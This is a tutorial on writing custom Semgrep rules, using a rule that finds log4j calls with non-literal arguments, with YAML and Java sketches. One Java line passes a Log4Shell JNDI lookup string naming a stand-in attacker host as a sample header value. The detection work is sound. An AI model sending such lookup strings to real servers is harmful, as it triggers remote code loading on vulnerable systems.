Building Custom Detection Signatures (SAST)

Most commercial SAST tools ship with thousands of detection signatures but offer little room to customize them. You get their rules or nothing. This creates two problems: false positives from generic patterns that don't match your application's architecture, and false negatives from vulnerabilities that don't fit any pre-built signature.

Off-the-shelf tooling handles the well-known patterns like basic XSS and straightforward SQLi. But look at the high-impact bug bounty reports disclosed in recent years. Almost none of them would be caught by a generic scanner. They require context about the specific application: how data flows through it, which libraries are in use, and how they're configured. A trivially easy-to-spot vulnerability does surface occasionally, but it's the exception.

This is where custom detection signatures come in. If you can write rules tailored to your application's patterns, you can catch the things generic tools miss. This post covers Semgrep, an open-source SAST tool with a rules engine designed for exactly this.

Semgrep

"If a developer has to convince their manager to spend a few million dollars on advanced security tools each time they change jobs, the future is bleak." - Semgrep philosophy

Semgrep is a semantic code analysis tool. It grew out of sgrep, a code-search tool started at Facebook around 2009, and is now maintained by Semgrep, Inc. (formerly r2c). The name stands for "Semantic Grep." It pattern-matches against code structure, not just text. Where grep finds string literals, Semgrep understands what code is doing: matching function calls, tracking variable assignments, and following data flow across statements.

What makes it useful for custom detection:

Runs locally. Source code never leaves your machine. Unlike SaaS-based SAST tools that require uploading your codebase, Semgrep runs entirely in your environment. This also makes it fast enough to run in the IDE, in git commit hooks, or in CI/CD without slowing down the build.
Simple rule syntax. Rules are written in YAML using a pattern language that reads like the code it matches. You don't need to learn a DSL or write an AST visitor.
20+ languages supported, with pre-built rulesets for frameworks like Django, Express, and Spring.

Example: Detecting Exploitable log4j Usage

The Semgrep documentation covers the basics well and includes an interactive playground. Rather than walking through simple examples, here's a rule that targets something more interesting: detecting exploitable log4j usage, not just the presence of the library.

The rule uses three Semgrep operators:

- pattern: $LOGGER.$METHOD(...);
- pattern-inside: |
    import org.apache.log4j.$PKG;
    ...
    $LOGGER = $PKG. ... ;
    ...
- pattern-not: $LOGGER.$METHOD("...");

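Metavariables ($VAR) are placeholders that match any expression, like capture groups in regex. On its own, $LOGGER.$METHOD(...) matches any method call on any object. import org.apache.log4j.$PKG matches any import from the log4j package. A metavariable that appears in more than one clause must bind to the same code each time, which is how $LOGGER ties the logger assignment in pattern-inside to the call in pattern.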

Ellipses (...) match zero or more arguments, statements, or expressions. $LOGGER.$METHOD(...) matches a logger method call with any number of arguments. In pattern-inside, the ... between statements means "any number of lines between these."

pattern-not excludes matches. $LOGGER.$METHOD("...") with the ellipsis inside quotes matches calls where the argument is a hardcoded string. Since the log4j vulnerability is only exploitable when attacker-controlled input is logged, excluding hardcoded strings eliminates the most obvious false positives.
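
To run these clauses from the command line, they need the usual rule wrapper around them. Here's a minimal sketch of what that could look like. The id, message, and severity are placeholders picked for illustration, not values taken from the original rule:

```yaml
rules:
  - id: log4j-non-literal-log-argument   # hypothetical id
    languages: [java]
    severity: WARNING                     # placeholder severity
    message: >-
      log4j logger called with a non-literal argument.
      Check whether user input can reach this call.
    patterns:
      - pattern: $LOGGER.$METHOD(...);
      - pattern-inside: |
          import org.apache.log4j.$PKG;
          ...
          $LOGGER = $PKG. ... ;
          ...
      - pattern-not: $LOGGER.$METHOD("...");
```

Saved as, say, log4j-rule.yaml (a made-up filename), it can be pointed at a source tree with semgrep --config log4j-rule.yaml followed by the directory to scan.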

So the rule matches this line:

log.info("Request User Agent:" + userAgent);

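userAgent is concatenated into the log message, so the argument is no longer a fixed literal and may carry attacker-controlled data. The rule doesn't prove the value is tainted; it only sees that the argument isn't a plain string. A line like log.info("Application started"); would not match because its only argument is a hardcoded string.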
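
To make the call shapes concrete, here's a small sketch. StubLogger is a hypothetical stand-in so the file compiles without log4j on the classpath, which also means the rule's pattern-inside (it requires the log4j import) would not match this exact file. The comments describe how the same shapes would be treated in code that uses a real log4j logger.

```java
import java.util.ArrayList;
import java.util.List;

public class LoggerCallShapes {

    // Hypothetical stand-in for a log4j logger, used only so this sketch
    // compiles without the library. It records messages instead of writing them.
    public static final class StubLogger {
        public final List<String> messages = new ArrayList<>();

        public void info(String message) {
            messages.add(message);
        }
    }

    public static List<String> handleRequest(String userAgent) {
        StubLogger log = new StubLogger();

        // Single string literal: the shape pattern-not excludes.
        log.info("Application started");

        // Literal concatenated with a variable: not a lone literal, so this
        // is the shape the rule reports.
        log.info("Request User Agent:" + userAgent);

        // Same data routed through a local variable: still not a literal.
        String line = "UA=" + userAgent;
        log.info(line);

        return log.messages;
    }

    public static void main(String[] args) {
        // A lookup-style string, as an attacker might send in a header.
        for (String message : handleRequest("${jndi:ldap://attacker.example/a}")) {
            System.out.println(message);
        }
    }
}
```

The point of recording the messages is to show that the header value lands in the logged string unchanged in the second and third calls, which is exactly the condition the rule is trying to surface.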

SAST vs. SCA: Finding Exploitable Usage

This example highlights a distinction worth thinking about. Most organizations would detect log4j through SCA (Software Composition Analysis), a dependency scanner that flags the vulnerable library version. SCA tells you log4j exists in your dependency tree. It doesn't tell you whether the logger is actually called anywhere in your code, or whether user input reaches it.

The Semgrep rule goes a layer deeper. It finds the specific code paths where a log4j logger is called with a non-hardcoded argument, which is what makes the vulnerability exploitable. An application that imports log4j but only logs static strings isn't exploitable through this vector, and a SAST rule can distinguish between the two.

Static analysis isn't perfect. This rule has limitations in both directions: it will flag a variable that happens to not contain user input (false positive), and it will miss a code path where user input reaches the logger through a wrapper function that doesn't match the pattern (false negative). But it's a meaningful step beyond "is the library present?"
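
Both failure modes are easy to picture in code. The sketch below uses a hypothetical StubLogger in place of a real log4j logger, and the method names are invented for illustration. The comments describe how a purely syntactic rule of this shape would likely behave, not verified scanner output.

```java
import java.util.ArrayList;
import java.util.List;

public class RuleBlindSpots {

    // Hypothetical stand-in for a log4j logger so the sketch compiles
    // without the library. It records messages instead of writing them.
    public static final class StubLogger {
        public final List<String> messages = new ArrayList<>();

        public void info(String message) {
            messages.add(message);
        }
    }

    // False-positive shape: the argument is not a string literal, so a
    // syntactic rule reports it, yet no user input is involved.
    public static void logStartup(StubLogger log, long elapsedMs) {
        log.info("Started in " + elapsedMs + " ms");
    }

    // Hypothetical wrapper: callers never touch the logger directly.
    public static void audit(StubLogger log, String detail) {
        log.info("audit: " + detail);
    }

    // False-negative shape: user input enters through the wrapper. The call
    // below is not a method call on a logger object, so a rule keyed on
    // $LOGGER.$METHOD(...) has nothing to match on this line. At best the
    // rule reports the log call inside audit, with no hint about which
    // callers pass user input.
    public static void handleLogin(StubLogger log, String username) {
        audit(log, username);
    }

    // Runs both shapes and returns what was logged.
    public static List<String> demo(String username) {
        StubLogger log = new StubLogger();
        logStartup(log, 42);
        handleLogin(log, username);
        return log.messages;
    }
}
```

Closing the second gap usually means writing an additional rule for the wrapper itself, which is the kind of application-specific knowledge a generic ruleset can't have.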

Building Rules from Your Own Findings

The most effective way to build custom Semgrep rules is to work backwards from real vulnerabilities. When you find a bug through manual testing or a pentest that your existing SAST tools missed, write a rule that catches the pattern. This turns a one-time finding into ongoing detection.

Semgrep's rule syntax is simple enough that writing a rule takes minutes, not hours. You don't need to be a compiler engineer or write AST visitors. If you can read the code you're trying to detect, you can write the rule.